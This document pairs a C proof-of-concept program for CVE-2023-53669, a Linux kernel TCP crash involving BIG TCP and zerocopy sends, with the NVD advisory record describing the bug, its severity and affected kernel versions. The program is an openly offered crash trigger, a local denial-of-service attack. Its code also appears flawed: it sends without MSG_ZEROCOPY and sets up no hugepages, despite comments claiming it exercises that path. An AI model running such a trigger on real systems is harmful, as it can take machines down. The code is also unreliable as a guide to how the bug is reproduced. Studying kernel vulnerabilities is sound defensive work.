CVE-2023-53669

/* CVE-2023-53669 PoC - Linux Kernel TCP skb_copy_ubufs crash * Trigger condition: BIG TCP + SO_ZEROCOPY + hugepages + skb > ~68KB * * This PoC demonstrates how to trigger the vulnerability by sending * large data via TCP zerocopy on a system with BIG TCP enabled. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <netinet/in.h> #include <netinet/tcp.h> #define BUFFER_SIZE (256 * 1024) // 256KB, exceeds ~68KB limit #define SERVER_PORT 9999 int main(int argc, char *argv[]) { int sockfd; struct sockaddr_in server_addr; char *buffer; int ret; // Allocate large buffer (must be page-aligned for zerocopy) ret = posix_memalign((void **)&buffer, 4096, BUFFER_SIZE); if (ret != 0) { perror("posix_memalign"); return -1; } // Fill buffer with data memset(buffer, 'A', BUFFER_SIZE); // Create TCP socket sockfd = socket(AF_INET, SOCK_STREAM, 0); if (sockfd < 0) { perror("socket"); free(buffer); return -1; } // Enable SO_ZEROCOPY for zero-copy transmission int zerocopy = 1; if (setsockopt(sockfd, SOL_SOCKET, SO_ZEROCOPY, &zerocopy, sizeof(zerocopy)) < 0) { perror("setsockopt SO_ZEROCOPY"); // Continue anyway - may still trigger on some configs } // Connect to server (requires a TCP listener on SERVER_PORT) memset(&server_addr, 0, sizeof(server_addr)); server_addr.sin_family = AF_INET; server_addr.sin_port = htons(SERVER_PORT); server_addr.sin_addr.s_addr = inet_addr("127.0.0.1"); if (connect(sockfd, (struct sockaddr *)&server_addr, sizeof(server_addr)) < 0) { perror("connect"); close(sockfd); free(buffer); return -1; } // Send large data via zerocopy - triggers skb_copy_ubufs() // with skb size > MAX_SKB_FRAGS * PAGE_SIZE (~68KB) ssize_t sent = send(sockfd, buffer, BUFFER_SIZE, 0); if (sent < 0) { perror("send"); } else { printf("Sent %zd bytes via zerocopy\n", sent); } close(sockfd); free(buffer); return 0; }

{"cve": {"id": "CVE-2023-53669", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:50.770", "lastModified": "2026-02-26T23:14:23.720", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntcp: fix skb_copy_ubufs() vs BIG TCP\n\nDavid Ahern reported crashes in skb_copy_ubufs() caused by TCP tx zerocopy\nusing hugepages, and skb length bigger than ~68 KB.\n\nskb_copy_ubufs() assumed it could copy all payload using up to\nMAX_SKB_FRAGS order-0 pages.\n\nThis assumption broke when BIG TCP was able to put up to 512 KB per skb.\n\nWe did not hit this bug at Google because we use CONFIG_MAX_SKB_FRAGS=45\nand limit gso_max_size to 180000.\n\nA solution is to use higher order pages if needed.\n\nv2: add missing __GFP_COMP, or we leak memory."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.19", "versionEndExcluding": "6.1.29", "matchCriteriaId": "573E342E-2B55-4488-86DF-4C7FD5453C75"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.2.16", "matchCriteriaId": "F92F7C8E-A977-4255-B1B6-D1908D8B408F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.3", "versionEndExcluding": "6.3.3", "matchCriteriaId": "6D96A7FC-D812-4458-AEA8-3FF4023E6B75"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/3c77a377877acbaf03cd7caa21d3644a5dd16301", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7e692df3933628d974acb9f5b334d2b3e885e2a6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7fa93e39fbb0566019c388a8038a4d58552e0910", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9cd62f0ba465cf647c7d8c2ca7b0d99ea0c1328f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}